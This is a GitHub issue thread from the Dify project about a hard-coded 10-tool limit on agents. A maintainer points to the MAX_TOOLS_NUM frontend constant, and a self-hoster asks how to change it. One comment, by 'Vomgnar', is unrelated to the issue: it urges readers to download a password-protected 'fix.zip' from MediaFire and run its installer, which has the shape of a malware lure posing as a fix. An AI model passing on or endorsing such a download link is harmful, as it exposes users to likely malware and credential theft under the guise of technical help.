### ISSUE TITLE
Agent cannot use more than 10 tools, is there any way to optimize this? Or route to the agent in the workflow to enable agent usage in different scenarios

### ISSUE THREAD

**Issue by hackerYHT** [langgenius/dify#7740]
### Self Checks

- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### 1. Is this request related to a challenge you're experiencing? Tell me about your story.

agent如下：无法使用超过10个工具，
场景：希望能根据用户问题使用不一样的工具，而且没有工具数量的限制
![image](https://github.com/user-attachments/assets/bb42ef64-64ea-45d3-9d6e-23bb034249ff)

### 3. Can you help us with this feature?

- [ ] I am interested in contributing to this feature.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by crazywoola** [comment]
https://github.com/langgenius/dify/blob/fbf31b5d5269db67bed7dae4d3e9a09ded89dd0c/web/config/index.ts#L151

We have some predefined values in frontend. We will fix them later.

**Comment by Christopheraudaz** [comment]
Hi

> [dify/web/config/index.ts](https://github.com/langgenius/dify/blob/fbf31b5d5269db67bed7dae4d3e9a09ded89dd0c/web/config/index.ts#L151)
> 
> Line 151 in [fbf31b5](/langgenius/dify/commit/fbf31b5d5269db67bed7dae4d3e9a09ded89dd0c)
> 
>  export const MAX_TOOLS_NUM = 10 
> We have some predefined values in frontend. We will fix them later.

Hi, I had a Self host. I installed with this predefined value "MAX_TOOLS_NUM = 10" . How I can change this number os Tools?
